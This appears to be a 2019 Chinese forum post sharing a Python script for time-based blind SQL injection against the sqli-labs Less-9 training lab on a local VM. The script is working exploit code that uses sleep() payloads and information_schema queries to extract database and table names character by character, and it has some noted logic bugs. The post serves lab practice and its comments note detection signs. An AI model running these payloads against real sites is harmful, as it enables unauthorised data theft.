[原创]sql-labs Time-based盲注脚本
发表于: 2019-3-25 16:52 4730
sqli-labs lab9/lab10是基于时间的盲注,如果完全用手动注入,费时费力。想到之前写过一篇基于布尔盲注的博文,于是我把当时脚本中的payload进行了修改,记录于此。
相比之前的脚本,替换了payload。另外,脚本记录了发送请求前的时间和响应返回的时间,比较时间差是否大于payload中设置的sleep时间(因为测试用的服务器就在本地虚拟机里,几乎不会有延迟,所以可以这么简单的比较时间差)。
"""Time-based blind SQL injection walkthrough script for sqli-labs Less-9.

Educational lab script. Every probe embeds a conditional ``sleep()`` in the
query string and the client decides "true"/"false" purely from the
round-trip time. Defensive take-aways visible right in the payload strings
below: each request carries ``sleep(`` and (for table enumeration)
``information_schema.tables`` in the URL, and recovering a single
character costs up to ``len(chars)`` requests, each ~2-3 s long -- a
pattern that stands out in web-server access logs, WAF rules and
database slow-query logs.
"""
import requests
import time

# Upper bounds for the brute-force loops. Only the DBName/TableName/Table_Num
# ones are used by the functions below; the Column*/Data* constants are
# declared but unused in this listing.
MAX_DBName_len = 100
MAX_TableName_len = 100
MAX_ColumnName_len = 100
MAX_Data_len = 100
MAX_Table_Num = 100
MAX_Column_Num = 100
MAX_Data_Num = 100
# Candidate alphabet for character-by-character recovery. If a real name
# contains a character outside this set, the inner loops below give up with
# "Letters too little!".
chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz{}_!@#$%^&*()'
# Lab target (local VM, per the author's note); the injection point is ``id``.
target_url = "http://192.168.119.135/sqli-labs/Less-9/?id=1"


def get_DBName_len() -> int:
    """Return the length of ``database()`` by probing lengths 0..MAX_DBName_len-1.

    A probe is treated as "true" when the response takes longer than the
    3-second ``sleep(3)`` in the payload. The author relies on the target being
    a local VM with negligible network latency; on a real network this fixed
    threshold would misclassify slow responses (no baseline measurement is
    taken).

    Calls ``exit()`` (terminating the whole script) if no length matched.
    """
    print("Start to get DBName_len...")
    DBName_len = 0
    url_template = target_url + "' union select 1,2,if (length(database())={0},sleep(3),null) %2D%2D%20"
    for i in range(0, MAX_DBName_len):
        # Timer is started before the request and compared after it returns.
        starttime = time.time()
        url = url_template.format(i)
        response = requests.get(url)  # response body is never inspected; only the elapsed time matters
        if time.time()-starttime > 3:
            DBName_len = i;
            print("DBName_len is: ", DBName_len)
            break;
        # Reached only on the last iteration when nothing matched.
        if DBName_len == 0:
            if i == MAX_DBName_len - 1:
                print("DBName_len > MAX_DBName_len!")
                print("Cannot get DB_len. Program ended.")
                exit()
    return DBName_len


def get_DBName(DBName_len: int) -> str:
    """Recover ``database()`` one character at a time.

    Args:
        DBName_len: number of characters to recover (from ``get_DBName_len``).

    Returns:
        The recovered name. Uses a 2-second threshold against ``sleep(2)``.

    Calls ``exit()`` if a position matches no character in ``chars``.
    """
    print("Start to retrieve database name...")
    DBName = ""
    url_template = target_url + "' union select 1,2, if(ascii(substr(database(),{0},1))={1},sleep(2),null) %2D%2D%20"
    for i in range(1, DBName_len + 1):
        # Snapshot so we can tell afterwards whether this position matched anything.
        tempDBName = DBName
        for char in chars:
            char_ascii = ord(char)
            url = url_template.format(i, char_ascii)
            starttime = time.time()
            response = requests.get(url)  # unused; timing is the only signal
            if time.time()-starttime > 2:
                DBName += char
                break
        if tempDBName == DBName:
            print("Letters too little! Program ended.")
            exit()
    print("Retrieve completed! \nDBName is: " + DBName)
    return DBName


def get_TableNumOfDB(DBName: str) -> int:
    """Return how many tables the current database has (0..MAX_Table_Num-1).

    Args:
        DBName: accepted for symmetry with the other helpers but not used;
            the payload queries ``database()`` directly.

    Returns:
        The matched count, or 0 if none of the probes matched.
    """
    print("Start to get TableNumOfDB...")
    TableNumOfDB = 0
    url_template = target_url + "' and if ((select count(table_name)a from information_schema.tables where table_schema = database() having a={0}),sleep(2),true) %2D%2D%20"
    for i in range(0, MAX_Table_Num):
        url = url_template.format(i)
        starttime = time.time()
        response = requests.get(url)  # unused; timing is the only signal
        if time.time()-starttime > 2:
            TableNumOfDB = i;
            print("the number of table is:" , TableNumOfDB)
            break
        # NOTE(review): this compares ``i`` with ``TableNumOfDB - 1`` (i.e. -1
        # while nothing has matched) rather than with ``MAX_Table_Num - 1``, so
        # the "too many tables" message below can never be printed; the
        # message text also names MAX_TableName_len. Left as in the original.
        if TableNumOfDB == 0:
            if i == TableNumOfDB - 1:
                print("table number of database > MAX_TableName_len!")
    return TableNumOfDB


def get_TableName_len(Table_num: int) -> int:
    """Return the name length of the ``Table_num``-th table (1-based).

    Args:
        Table_num: 1-based table index; ``Table_num - 1`` becomes the SQL
            ``limit`` offset. NOTE(review): the module-level loop at the bottom
            passes 0 as well, which yields ``limit -1,1`` -- confirm what the
            lab returns for that case.

    Returns:
        The matched length, or 0 if none matched.
    """
    print("Start to get TableName_len...")
    TableName_len = 0
    url_template = target_url + "' and if (( (select length(table_name) from information_schema.tables where table_schema = database() limit {0},1)={1}),sleep(2),true) %2D%2D%20"
    for i in range(0, MAX_TableName_len):
        url = url_template.format(Table_num - 1, i)
        starttime = time.time()
        response = requests.get(url)  # unused; timing is the only signal
        if time.time()-starttime > 2:
            TableName_len = i
            break
        # Reached only on the last iteration when nothing matched; this one
        # only reports, it does not exit like get_DBName_len does.
        if TableName_len == 0:
            if i == MAX_TableName_len - 1:
                print("TableName_len > MAX_TableName_len!")
    return TableName_len


def get_TableName(Table_num: int, TableName_len: int) -> str:
    """Recover the name of the ``Table_num``-th table character by character.

    Args:
        Table_num: 1-based table index (``Table_num - 1`` is the ``limit`` offset).
        TableName_len: number of characters to recover.

    Returns:
        The recovered table name.

    Calls ``exit()`` if a position matches no character in ``chars``.
    """
    print("Start to get TableName...")
    TableName = ""
    url_template = target_url + "' and if ((ascii(substr((select table_name from information_schema.tables where table_schema = database() limit {0},1),{1},1))={2}),sleep(2),true) %2D%2D%20"
    for i in range(1, TableName_len + 1):
        tempTableName = TableName
        for char in chars:
            char_ascii = ord(char)
            url = url_template.format(Table_num - 1, i, char_ascii)
            starttime = time.time()
            response = requests.get(url)  # unused; timing is the only signal
            if time.time()-starttime > 2:
                TableName += char
                break
        if tempTableName == TableName:
            print("Letters too little! Program ended.")
            exit()
    print("Retrieve completed! \nTableName is: " + TableName)
    return TableName


# Driver: enumerates table indices 0..4 directly rather than calling
# get_DBName_len / get_DBName / get_TableNumOfDB first (the commented-out
# print below refers to DBName, which is therefore never defined here).
#print("tables in "+DBName+":")
for i in range(0,4+1):
    TableName_len = get_TableName_len(i)
    TabName = get_TableName(i,TableName_len)